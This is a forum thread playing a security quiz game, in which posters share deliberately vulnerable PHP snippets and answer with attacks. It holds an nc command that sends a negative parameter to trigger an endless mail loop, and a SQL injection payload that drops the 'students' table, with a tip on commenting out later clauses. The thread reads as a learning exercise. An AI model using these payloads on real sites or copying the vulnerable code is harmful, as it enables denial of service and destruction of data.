Security Quiz

[Oceanic]

Ok, this game is easy.
I start writing a question about computer security, if some one can answere it with a correct motivaion they write a new. The first that make 10 correct answere win.

Here is my first question:
You want to lagg a email site down (you want to send as many e-mail as possebile).
You know that the site use this scipt:

<?
if(isset($_GET["numbers_of_mail) && !empty($_GET["numbers_of_mail)){
	for($loop = 0; $loop != $_GET["numbers_of_mail"]; $loop++){
	mail('[email protected]', 'Spam Message', "Hello");
	}
}
?>

What can you do to crash the site?

 

[kornholi]

Your script is broken =) (missing quotes)
;;

echo "GET /scriptplzz.php?numbers_of_mail=-1\n\rHost: noobsite.com\n\r\n\r" | nc noobsite.com 80

Hooray infinite loop!

;-;

Here's a classic one:

$query = "SELECT `password` FROM `students` WHERE `username` = '{$_GET['logon']}'";
$result = mysql_query($link, $query);

Russian Mafia will give you jonnyland if you nuke ``students'' table ;-)

 

[Oceanic]

Your script is broken =) (missing quotes)
;;

echo "GET /scriptplzz.php?numbers_of_mail=-1\n\rHost: noobsite.com\n\r\n\r" | nc noobsite.com 80

Hooray infinite loop!

;-;

Here's a classic one:

$query = "SELECT `password` FROM `students` WHERE `username` = '{$_GET['logon']}'";
$result = mysql_query($link, $query);

Russian Mafia will give you jonnyland if you nuke ``students'' table ;-)

Ooops was tierd when i wrote it:huh:
It is correct all >0 make a infinitive loop :thumbup:

 

[Jonern]

Not sure if this is enough for you (i'm no expert )

Korn'; DROP TABLE `students`;

 

[kornholi]

Not sure if this is enough for you (i'm no expert )

Korn'; DROP TABLE `students`;

HOORAH A POINT (sorry, no jonnyland)! If I had more than one where clause you would use ;-- after evul command, so it would ignore the other where clauses

Ooops was tierd when i wrote it:huh:
It is correct all >0 make a infinitive loop :thumbup:

No, everything <0 !

 

[Oceanic]

Sorry again wrote this at 02:00 local time, and i was drunk to